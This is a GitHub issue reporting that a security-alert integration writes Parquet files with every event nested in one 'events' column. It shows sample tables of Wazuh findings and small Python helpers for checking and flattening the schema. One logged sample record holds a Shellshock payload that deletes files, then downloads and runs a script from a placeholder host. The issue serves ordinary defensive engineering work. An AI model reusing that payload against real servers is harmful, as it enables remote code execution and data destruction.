Bad Parquet format on Amazon Security Lake integration #214

Closed
AlexRuiz7 opened this issue Apr 25, 2024 · 0 comments · Fixed by #217
Labels: level/task, type/bug

AlexRuiz7 commented Apr 25, 2024

Description

During unscheduled internal testing of the Amazon Security Lake integration, I detected that the Parquet files are being saved in an incorrect format: all the events are stored in a single column.

This bug was probably introduced in #189.

The expected format looks like this:

+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
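The column list in the expected table can double as a quick sanity check for generated files. Below is a minimal, library-free sketch, assuming you already have the file's top-level column names as a list of strings (for example, from whatever Parquet reader you use). `EXPECTED_COLUMNS` is copied from the header of the table above; `schema_problems` is a hypothetical helper, not part of the integration.

```python
# Top-level columns expected in each Parquet file, copied from the
# "expected format" table (same order as its header row).
EXPECTED_COLUMNS = [
    "activity_id", "category_name", "category_uid", "class_name",
    "class_uid", "count", "message", "finding_info", "metadata",
    "raw_data", "resources", "risk_score", "severity_id", "status_id",
    "time", "type_uid", "unmapped",
]


def schema_problems(column_names):
    """Return human-readable problems found in a file's top-level columns.

    `column_names` is a plain list of strings (hypothetical input; obtain it
    from your Parquet reader of choice). An empty list means "looks right".
    """
    problems = []
    # The bug described in this issue: everything nested under one column.
    if list(column_names) == ["events"]:
        problems.append("all fields are wrapped in a single 'events' column")
    # Any expected top-level field that is not present as its own column.
    missing = [c for c in EXPECTED_COLUMNS if c not in column_names]
    if missing:
        problems.append("missing columns: " + ", ".join(missing))
    return problems
```

With the current (broken) layout, `schema_problems(["events"])` reports both the single wrapper column and every missing top-level field, while the expected layout yields an empty list.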

Originally posted in #145 (comment)

The Parquet files currently being written use this (incorrect) format:

+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| events                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 1, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80791'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/crond', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/crond', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Ubuntu', 'uid': '004'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:20:46.976+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                             |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 1, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80790'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/bash', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/bash', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Debian', 'uid': '007'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:22:03.034+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                               |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 0, 'finding_info': {'analytic': {'category': 'ciscat', 'name': 'N/A', 'type_id': 1, 'uid': '1740'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Sample alert 1', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Sample alert 1', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Windows', 'uid': '006'}], dtype=object), 'risk_score': 9, 'severity_id': 3, 'status_id': 99, 'time': '2024-04-22T14:22:08.087+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                                                                             |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 11, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80784'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/id', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/id', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Centos', 'uid': '005'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:21:42.780+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                                  |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 369, 'finding_info': {'analytic': {'category': 'vulnerability-detector', 'name': 'json', 'type_id': 1, 'uid': '23504'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'CVE-2019-1010204 affects binutils', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'CVE-2019-1010204 affects binutils', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'RHEL7', 'uid': '001'}], dtype=object), 'risk_score': 7, 'severity_id': 2, 'status_id': 99, 'time': '2024-04-22T14:23:28.987+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['vulnerability-detector', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                               |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 4, 'finding_info': {'analytic': {'category': 'wazuh, rootcheck', 'name': 'rootcheck', 'type_id': 1, 'uid': '510'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Host-based anomaly detection event (rootcheck).', 'types': array(['log'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Host-based anomaly detection event (rootcheck).', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': "Rootkit 'Slapper' detected by the presence of file '/tmp/.font-unix/.cinik'.", 'resources': array([{'name': 'Centos', 'uid': '005'}], dtype=object), 'risk_score': 7, 'severity_id': 2, 'status_id': 99, 'time': '2024-04-22T14:20:41.931+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['rootcheck', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                        |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 13, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80784'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/hostname', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/hostname', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'RHEL7', 'uid': '001'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:24:55.045+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                       |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 1, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80790'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/bash', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/bash', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Ubuntu', 'uid': '004'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:24:44.879+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                               |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 3, 'finding_info': {'analytic': {'category': 'wazuh, rootcheck', 'name': 'rootcheck', 'type_id': 1, 'uid': '510'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Host-based anomaly detection event (rootcheck).', 'types': array(['log'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Host-based anomaly detection event (rootcheck).', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': "Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic).", 'resources': array([{'name': 'RHEL7', 'uid': '001'}], dtype=object), 'risk_score': 7, 'severity_id': 2, 'status_id': 99, 'time': '2024-04-22T14:25:00.128+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['rootcheck', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}} |
| {'activity_id': 1, 'category_name': 'Findings', 'category_uid': 2, 'class_name': 'Detection Finding', 'class_uid': 2004, 'count': 6, 'finding_info': {'analytic': {'category': 'audit, audit_command', 'name': 'N/A', 'type_id': 1, 'uid': '80784'}, 'attacks': {'tactic': {'name': 'N/A', 'uid': 'N/A'}, 'technique': {'name': 'N/A', 'uid': 'N/A'}, 'version': 'v13.1'}, 'title': 'Audit: Command: /usr/sbin/ls', 'types': array(['N/A'], dtype=object), 'uid': '1580123327.49031'}, 'message': 'Audit: Command: /usr/sbin/ls', 'metadata': {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'}, 'raw_data': '', 'resources': array([{'name': 'Windows', 'uid': '006'}], dtype=object), 'risk_score': 3, 'severity_id': 1, 'status_id': 99, 'time': '2024-04-22T14:24:49.960+0000', 'type_uid': 200401, 'unmapped': {'data_sources': array(['', 'wazuh-manager'], dtype=object), 'nist': array([], dtype=object)}}                                                                                                                                                                                  |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

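It looks like each event has been wrapped into a single "events" column instead of having its fields written as separate top-level columns.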
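To illustrate the difference between the two layouts, here is a library-free sketch, assuming each stored row is a Python dict shaped like the rows above (`{'events': {...}}`). `unwrap_events` and `to_columns` are hypothetical helpers, not code from the integration, and the actual fix in #217 may work differently. The idea is to unwrap each event and then build one list per top-level field; a column-oriented dict like this is the shape that pyarrow's `pa.Table.from_pydict` accepts when building a table for a Parquet writer.

```python
def unwrap_events(rows, wrapper="events"):
    """Turn rows shaped like {"events": {...}} into flat event dicts.

    Rows that are not wrapped are passed through unchanged.
    """
    flat = []
    for row in rows:
        if set(row) == {wrapper} and isinstance(row[wrapper], dict):
            flat.append(row[wrapper])
        else:
            flat.append(row)
    return flat


def to_columns(events):
    """Build a column-oriented dict: one list per top-level field.

    Fields absent from some events are filled with None so that every
    column has one entry per event.
    """
    keys = []
    for event in events:
        for key in event:
            if key not in keys:  # keep first-seen field order
                keys.append(key)
    return {key: [event.get(key) for event in events] for key in keys}


if __name__ == "__main__":
    wrapped = [
        {"events": {"activity_id": 1, "class_uid": 2004, "message": "Sample alert 1"}},
        {"events": {"activity_id": 1, "class_uid": 2004, "message": "Audit: Command: /usr/sbin/bash"}},
    ]
    cols = to_columns(unwrap_events(wrapped))
    print(list(cols))  # ['activity_id', 'class_uid', 'message']
```

Keeping the flattening step separate from the writer makes it easy to check the column layout before any file is produced.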

AlexRuiz7 added the level/task and type/bug labels on Apr 25, 2024
AlexRuiz7 self-assigned this on Apr 25, 2024
AlexRuiz7 changed the title from "Bad format on Parquet file for the Amazon Security Lake integration" to "Bad Parquet fileformat on Amazon Security Lake integration Parquet files" on Apr 25, 2024
AlexRuiz7 changed the title from "Bad Parquet fileformat on Amazon Security Lake integration Parquet files" to "Bad Parquet format on Amazon Security Lake integration" on Apr 25, 2024
AlexRuiz7 mentioned this issue on Apr 26, 2024